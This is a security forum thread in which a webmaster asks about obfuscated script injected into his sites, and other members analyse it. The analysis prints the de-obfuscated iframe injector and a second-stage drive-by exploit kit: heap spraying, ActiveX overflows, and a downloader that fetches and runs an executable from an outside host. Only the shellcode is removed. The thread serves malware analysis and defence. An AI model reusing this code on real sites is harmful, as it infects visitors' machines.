• RSS
  • Twitter
  • FaceBook

Security Forums

Log in

FAQ | Search | Usergroups | Profile | Register | RSS | Posting Guidelines | Recent Posts

What Does This Hack Do? (a new one)

Users browsing this topic:0 Security Fans, 0 Stealth Security Fans
Registered Security Fans: None
Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Computer Forensics and Incident Response

View previous topic :: View next topic  
Author Message
mrconsumer
Just Arrived
Just Arrived


Joined: 24 Jul 2007
Posts: 0


Offline

PostPosted: Tue Nov 13, 2007 1:24 pm    Post subject: What Does This Hack Do? (a new one) Reply with quote

I am so exasperated! I have three different websites with two different hosts, and each, on average, once a month, has all .htm and .php files in the root directory changed.

All that is done is a line, like the one below, is added as the last line of the file.

I have changed my passwords multiple times, to no avail. I have scanned my home computer repeatedly for rootkits, viruses, spyware, etc., and remove any/all found.

Two questions:

(1) any idea how to stop this?
(2) what does this particular one do? (the line is copied below).

Thanks,
Ed

Moderator note: removed large malicious code snippet to avoid AV hits - capi
Back to top
View user's profile Send private message
jumperinthedoor
Just Arrived
Just Arrived


Joined: 30 Oct 2007
Posts: 0


Offline

PostPosted: Tue Nov 13, 2007 7:46 pm    Post subject: Reply with quote

It is obfuscated javascript. Here it is de-obfuscated:

Code:
<script>
function IFrame(){}
IFrame.prototype = {

   host : 'drivers.aero4.cn',
   path : '/x86/',
   cookieName : 'vda4r',
   cookieValue : 1,

   setCookie : function(name, value)
   {
      var d= new Date(); d.setTime(new Date().getTime() + 86400000);
      document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString();          
   },
   install : function()
   {
      if(!this.alreadyInstalled())
      {
         var s = "<iframe width=1 height=1 frameBorder=0 src='" + this.getFrameURL() + "'></iframe>";
         try { document.write(s) }
         catch(e){ document.write("<html><body>" + s + "</body></html>") }
         this.setCookie(this.cookieName, this.cookieValue);   
      }
   },
   getFrameURL : function()
   {
      var dlh=document.location.host;
      return 'http://' + ((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')  + "." + this.getRandString() + "." + this.host + this.path;
   },
   alreadyInstalled : function()
   {
      return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
   },
   getRandString : function()
   {
      var l=16, c= '0123456789abcdef', o='';
      for (var i=0; i < l; i++)         
         o+=c.substr (Math.floor(Math.random() * c.length), 1, 1);
               
      return o;
   }   
}
var o = new IFrame();
o.install();
</script>



It drops a cookie if one is not already present. If the cookie is present, it does nothing. If it isn't, it writes an iframe to a unique number/letter combo pre-pended to drivers.aero4.cn/x86/. Something like: hxxp:\\c2pod47eross9r32.80f4r02113f6re45.drivers.aero4.cn/x86/

Moderator note: added [code] tags - capi
Back to top
View user's profile Send private message Yahoo Messenger
mrconsumer
Just Arrived
Just Arrived


Joined: 24 Jul 2007
Posts: 0


Offline

PostPosted: Tue Nov 13, 2007 8:07 pm    Post subject: Reply with quote

Thanks.

Do you have the sense it is dangerous ultimately?

How do I stop this crap from being appended to my files on my server?

Edg
Back to top
View user's profile Send private message
jumperinthedoor
Just Arrived
Just Arrived


Joined: 30 Oct 2007
Posts: 0


Offline

PostPosted: Tue Nov 13, 2007 8:35 pm    Post subject: Reply with quote

This is dangerous to anyone who visits your websites. It probably drops malware on their machines if they are vulnerable to whatever exploits are hosted on the iframe server.

Maybe your host was compromised. Does the host use something like c-panel? If you have made sure you don't have a keystroke logger on your home computer and changed your passwords on your hosts the next thing I would do is make sure you don't have any vulnerable server software. Check your php version. Check for sql injection problems too. Then contact your hosting provider or examine other sites on the host to see if they have the same javascript in them.

Also, an update on your javascript: whatever.whatever.drivers.aero4.cn/x86/ redirects (302) to whatever.cnc-inc.cn/r7e/1/. The .cnc-inc.cn/r7e/1/ does some checking to make sure wget isn't being used. I forged the user-agent and downloaded some additional obfuscated javascript that is a little more tricky to take apart. Working on it now.
Back to top
View user's profile Send private message Yahoo Messenger
mrconsumer
Just Arrived
Just Arrived


Joined: 24 Jul 2007
Posts: 0


Offline

PostPosted: Tue Nov 13, 2007 8:44 pm    Post subject: Reply with quote

Jump,

You are most kind to look into this for me.

My host does use a version of C-panel that I believe they have customized. What should I ask them to look for there in terms of a vulnerablility?

As to the other stuf... yes, I have changed passwords, again and again. I do not have access to other sites on my server, as it is shared.

I also do not have the sophistication to examine scripts. For one of my sites, there is NO php at all... yet it gets hit. (Only php and htm/html files in the root directory get hacked.)

Ed
Back to top
View user's profile Send private message
jumperinthedoor
Just Arrived
Just Arrived


Joined: 30 Oct 2007
Posts: 0


Offline

PostPosted: Tue Nov 13, 2007 9:33 pm    Post subject: Reply with quote

I think you should probably contact the host provider and ask them for help. Without access to your server logs it would be difficult to determine how this happened.
Back to top
View user's profile Send private message Yahoo Messenger
mrconsumer
Just Arrived
Just Arrived


Joined: 24 Jul 2007
Posts: 0


Offline

PostPosted: Tue Nov 13, 2007 9:39 pm    Post subject: Reply with quote

Thanks. I have put in a ticket (but if history is any guide, no help will be forthcoming from them).

Ed
Back to top
View user's profile Send private message
jumperinthedoor
Just Arrived
Just Arrived


Joined: 30 Oct 2007
Posts: 0


Offline

PostPosted: Wed Nov 14, 2007 1:29 am    Post subject: Reply with quote

Update: The first javascript wrote an iframe to a site that hosted the javascript below which was also obfuscated. It attempts to exploit several vulnerabilities in software including Microsoft RDS, IE Webview folder icon, Winzip, Quicktime, Yahoo! Instant messenger and the GOM Player Activex control. The shellcode was removed to avoid triggering AV scanners on this post.

Quote:
var memory = new Array(), mem_flag = 0;
function having(){ memory = memory;
setTimeout ("having()" ,1800); }
function getSpraySlide (spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
spraySlide += spraySlide;

spraySlide = spraySlide.substring( 0,spraySlideSize / 2 );
return spraySlide;
}


function MDAC() {
var t = new Array(
"{BD96C556-65A3-11D0-983A-00C04FC29E30}",
"{BD96C556-65A3-11D0-983A-00C04FC29E36}",
"{AB9BCEDD-EC7E-47E1-9322-D4A210617116}",
"{0006F033-0000-0000-C000-000000000046}",
"{0006F03A-0000-0000-C000-000000000046}",
"{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}",
"{6414512B-B978-451D-A0D8-FCFDF33E833C}",
"{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}",
"{06723E09-F4C2-43c8-8358-09FCD1DB0766}",
"{639F725F-1B2D-4831-A9FD-874847682010}",
"{BA018599-1DB3-44f9-83B4-461454C84BF8}",
"{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}",
"{E8CCCDDF-CA28-496b-B050-6C07C962476B}", null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'hxxp:</></>96c09a6f722cf2ecfc690326e0b1c76d.cnc-inc.cn/r7e/1//file.php';

while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) {
var a = null;
try {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
}
catch(e)
{ a = null; }

if (a) {
if (! v[0]) {

v[0] = CreateObject(a, "msxml2.XMLHTTP");
if (! v[0])
v[0] = CreateObject(a, "Microsoft.XMLHTTP");

if (! v[0])
v[0] = CreateObject(a, "MSXML2.ServerXMLHTTP");
}

if (! v[1])
v[1] = CreateObject(a, "ADODB.Stream");

if (! v[2])
{
v[2] = CreateObject(a, "WScript.Shell");
if (! v[2])
{
v[2] = CreateObject(a, "Shell.Application");
if (v[2])
n=1;
}
}
}
i++;
}
if (v[0] && v[1] && v[2])
{
var data = XMLHttpDownload(v[0], urlRealExe);
if (data != 0) {
var name = "" + "c:"+"\\ms" + "nt" + GetRandString(4) + ".ex" + "e";
if (ADOBDStreamSave(v[1], name, data) == 1)
{
if (ShellExecute(v[2], name, n) == 1)
ret=1;
}
}
}
return ret;
}


function makeSlide()
{
var heapSprayToAddress = 0x0c0c0c0c;
var heapBlockSize = 0x400000;

var payLoadCode = unescape("REMOVED-BY-ANALYST");
var payLoadSize = payLoadCode.length * 2;

var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0c0c%u0c0c");

spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

for (i=0;i<heapBlocks;i++)
memory[i] = spraySlide + payLoadCode;
mem_flag = 1;

having();
return memory;
}

function startWinZip(object)
{
var xh = 'A';
while (xh.length < 231)
xh+='A';

xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";
object.CreateNewFolderFromName(xh);
}

function fds907f(o) {
var a=0x7ffffffe, b=0x0c0c0c0c;//, c=0x0c0c0c0c, d=0x0c0c0c0c;
o.setSlice(a,b,b,b);
}

function startWVF()
{
for (i=0;i<128;i++) {
try{ var o = new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1"); fds907f(o);}
catch(e){ }
}
}

function startOverflow(num)
{
if (num == 0) {
try {
var qt = new ActiveXObject("QuickTime.QuickTime");
if (qt) {
var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="1" height="1"

style="border:0px">'+
'<param name="src" value="mdqt.php">'+
'<param name="autoplay" value="true">'+
'<param name="loop" value="false">'+
'<param name="controller" value="true">'+
'</object>';
if (! mem_flag) makeSlide();
document.getElementById('mydiv').innerHTML = qthtml;
num = 255;
}
} catch(e) { }

if (num = 255) setTimeout("startOverflow(1)", 2000);
else startOverflow(1);

} else if (num == 1) {
try {
var winzip = document.createElement("object"); winzip.setAttribute("classid",

"clsid:A09AE68F-B14D-43ED-B713-BA413F034904");

var ret=winzip.CreateNewFolderFromName(unescape("%00"));
if (ret == false)
{
if (! mem_flag)
makeSlide();

startWinZip(winzip);
num = 255;
}
} catch(e) { }

if (num = 255)
setTimeout("startOverflow(2)", 2000);

else startOverflow(2);

} else if (num ==2)
{
try {
var tar = new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
if (tar)
{
if (! mem_flag) makeSlide();
startWVF();
}
} catch(e){ }
}
}


function GetRandString(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
for (var i=0; i<string_length; i++) {
var rnum = Math.floor(Math.random() * chars.length);
randomstring += chars.substring(rnum,rnum+1);
}

return randomstring;
}

function ADOBDStreamSave(o, name, data) {

try {
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(data);
o.SaveToFile(name, 2);
o.Close();
} catch(e) { return 0; }

return 1;
}

function CreateObject(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (! r) { try { eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}

function XMLHttpDownload(xml, url) {

try {
xml.open("GET", url, false);
xml.send(null);

} catch(e) { return 0; }

return xml.responseBody;
}


function ShellExecute(exec, name, type) {

if (type == 0) {
try { exec.Run(name, 0); return 1; } catch(e) { }
} else {
try { exe.ShellExecute(name); return 1; } catch(e) { }
}

return(0);

}
function start() { if (!MDAC()) startOverflow(0); }
</script>

</head><body onload="start()"><div id="mydiv"></div>
<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='yh8'></object><script language="javascript"> try {

yh8.GetFile("hxxp:</></>96c09a6f722cf2ecfc690326e0b1c76d.cnc-inc.cn/r7e/1//file.php?q=yh8","c:\\msvs7.exe",5,1,"msvs7"); } catch(e){

}</script>
<object classid='clsid:DC07C721-79E0-4BD4-A89F-C90871946A31' id='GomManager' /></object>
<script language='javascript'>
try {
var shellcode = unescape("REMOVED-BY-ANALYST");
var eip = unescape("REMOVED-BY-ANALYST");
var nop = '',i=0;
for(i=0; i < 48; i++) nop += unescape("%90");
var sURL = ''; for(i=0; i < 506; i++) sURL += 'A';
sURL += eip + nop + shellcode;
GomManager.OpenURL(sURL);
} catch(e) {}
</script>
</body></html>


Moderator note: added [code] tags - capi
Back to top
View user's profile Send private message Yahoo Messenger
capi
SF Senior Mod
SF Senior Mod


Joined: 21 Sep 2003
Posts: 16777097
Location: Portugal

Offline

PostPosted: Sat Nov 24, 2007 5:06 am    Post subject: Reply with quote

janvaljan, a new member of ours, had posted a reply to this thread in Spanish, translating the original post by mrconsumer to Spanish and adding some information and questions of his own.

SFDC is, by its very nature, an international community, and we are always looking forward to having members from all parts of the world join our community. However, being as though we are an international community with members from all over the world, we must maintain communication in a single language that, for better or worse, most people can more or less understand. It would make communication harder if we were to use several different languages amongst ourselves, and it would make the staff's job of moderating content very difficult.

To preserve what janvaljan said in his post, I have made an English translation, which I am including here.


-----BEGIN ENGLISH TRANSLATION-----

Hello I am peruan my name is jan sanchez and I also have the same problem.
that is a translation of the problem that this forum starts with (if anyone can translate it better you're welcome!!! Because my strength is not English)

Well I'll give you some data to see if anyone will help us
This script when it's injected on any website what it does is call two links
You'll see it when you go to an infected website you'll see how it links to two strange auto-generated addresses

It would be nice for you to install Internet Explorer 7 so that when you enter an infected website you get a warning first indicating if you want to show the content just choose no and you'll solve that problem so have no fear
I hope someone knows what's going on the weirdest part is that this problem doesn't just present itself in a single hosting but it's scattered all around the world.

I would like to know if anyone could explain to me in which way this code injects itself without having access to the hosting?
it's something we don't understand
because when you check the FTP program you can't see anything modified
it doesn't register it but you look at the source code and there's the script

thank you in advance
The links I didn't copy them but they say something like this
One of the links has this "drivers.aero4.cn"
And the other is a bunch of letters and numbers seemingly auto-generated that start like this
http://h5gsdywhjasdjhasjdahsjd

something like that

good luck

and I hope you can help us with this?
and what is it???
_________________
--------------------------------------------------
jANVALJAN

-----END ENGLISH TRANSLATION-----
Back to top
View user's profile Send private message
OddOne
Trusted SF Member
Trusted SF Member


Joined: 24 May 2004
Posts: 0


Offline

PostPosted: Wed Dec 12, 2007 11:09 pm    Post subject: Reply with quote

Just visiting this thread is tripping antivirus warnings for JS/Downloader.Agent in my browser cache (Firefox)...

Might wanna remove or "damage" the text so it doesn't cause issues.

oO
Back to top
View user's profile Send private message
Display posts from previous:   

Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Computer Forensics and Incident Response All times are GMT + 2 Hours
Page 1 of 1


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

Community Area

Log in | Register